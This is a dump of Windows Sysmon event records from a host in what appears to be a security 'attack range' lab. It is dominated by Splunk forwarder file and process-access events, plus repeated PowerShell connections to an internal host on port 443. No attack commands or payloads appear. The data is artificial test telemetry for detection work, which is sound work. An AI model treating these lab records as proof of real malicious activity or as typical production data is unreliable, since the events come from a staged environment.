AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035084052Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:43.638{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=7377E066625F29DF685B8A803AFCEA15,SHA256=DE9583BA7A545752E42F7F463397245FBB6A29CDBC1E520BF585ED690F80AFAA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084075Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:44.869{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE856B5584E62090D9014D338B6901B5,SHA256=6C5ABE3777B6FDFAF8FC1088E3A2AAB971F83DFEFD780243AA41331D4CA47E7B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084074Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:44.654{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A00BAD51F897F575B73E3E680C1A97F8,SHA256=5FA527F34F9DD76BFA4AD64D2A100511664B1746B24398B1F30C66D7A557024A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084073Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:44.654{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0070B1EAFD684E02B2D57D7A2F8A9EAE,SHA256=DC76E3FC6CB056A669D8AA8707ACDB89973C82977033798A74A007345CC555DA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035084072Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:44.469{B81B27B7-4DAC-613A-2C90-03000000C801}61804580C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000035084071Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:08.618{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56557-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 10341000x800000000000000035084070Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:44.316{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4DAC-613A-2C90-03000000C801}6180C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084069Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:44.316{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084068Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:44.316{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084067Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:44.316{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084066Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:44.316{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084065Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:44.316{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-4DAC-613A-2C90-03000000C801}6180C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035084064Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:44.316{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4DAC-613A-2C90-03000000C801}6180C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035084063Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:44.302{B81B27B7-4DAC-613A-2C90-03000000C801}6180C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035084085Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:45.884{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE7CA1722DC66AE1A80CDF388F81B98E,SHA256=D197B01ACA81746C0C79F8BB783898A24F53295429E143F1F6C49746A49AF7BE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084084Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:09.233{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56558-false10.0.1.12-8000- 10341000x800000000000000035084083Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:45.016{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4DAD-613A-2D90-03000000C801}4912C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084082Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:45.016{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084081Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:45.016{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084080Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:45.016{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084079Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:45.016{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084078Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:45.016{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-4DAD-613A-2D90-03000000C801}4912C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035084077Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:45.016{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4DAD-613A-2D90-03000000C801}4912C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035084076Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:45.001{B81B27B7-4DAD-613A-2D90-03000000C801}4912C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035084088Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:46.933{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=21A952F18925B7020B2717F560DB5501,SHA256=2D1B7E60767F05C1F7BFE63C981E182E9A065E39CC119E8AF167509361B93EE5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084087Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:46.868{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=58C1AD333E34902E9E8679F0A7C17EBE,SHA256=D56566CF84DA6579DE8F1B353C7DA071A3B29A129C4A181DEF2AF4D8E3A6041A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084086Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:46.037{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A00BAD51F897F575B73E3E680C1A97F8,SHA256=5FA527F34F9DD76BFA4AD64D2A100511664B1746B24398B1F30C66D7A557024A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084089Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:47.951{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8337003BACB98532949F1567C316D543,SHA256=B10C6993F348ACFB1946BD65EF88B618EE2B071279738B4DCC99E9D325D7CA65,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084091Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:48.967{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FEDB22852A128FA7BBD7C2666E35F336,SHA256=C08C1200BC47A0717638E2CA90353A649FF7345DB1B9F9F2500A418ADF7E14A5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084090Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:12.630{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56559-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035084092Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:49.982{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7BD18B3475A5702512924F24EF4B11DD,SHA256=A6B4649A95218A28F9B74B1C50354A8566C81976D7A442399A6F7E19921E5D5A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084093Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:15.245{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56560-false10.0.1.12-8000- 23542300x800000000000000035084094Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:51.034{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=68BA5A709C192179B7C155EF2E41FD95,SHA256=35CA6438FC8BE9FE9EA61844E9FB03CAAC43C5DE6F4FE0AC33D9135764E2D89F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084095Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:52.048{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=38BE9925EC85F24D37DC95818342D38A,SHA256=16097F50DE60F002FEC9CA1BAA5F5034524FB59540D3D01279BF17B7C918CE35,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084097Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:53.862{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=7B689CA7193A3E59320DF8B5C2B205D2,SHA256=0F70CE776534491A8B09EE1498DC690614CD77780FF30519095C88D7DB2470BD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084096Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:53.094{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3EB991E0BCD3B7C0B6CBD2AE240A2AFD,SHA256=5117985F6673A4CC88F8ADAF544127A5A7811E99226E788C78F602636E0DC23B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084100Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:54.792{B81B27B7-4013-611D-2700-00000000C801}2076NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=9D45E1BDB6F237A6CF51FFC6A12E6130,SHA256=87EEE278CDF62B2B86AF9CB87BDB04BAFB10272CEA175D83979B0C43158C5AB9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084099Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:18.642{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56561-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035084098Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 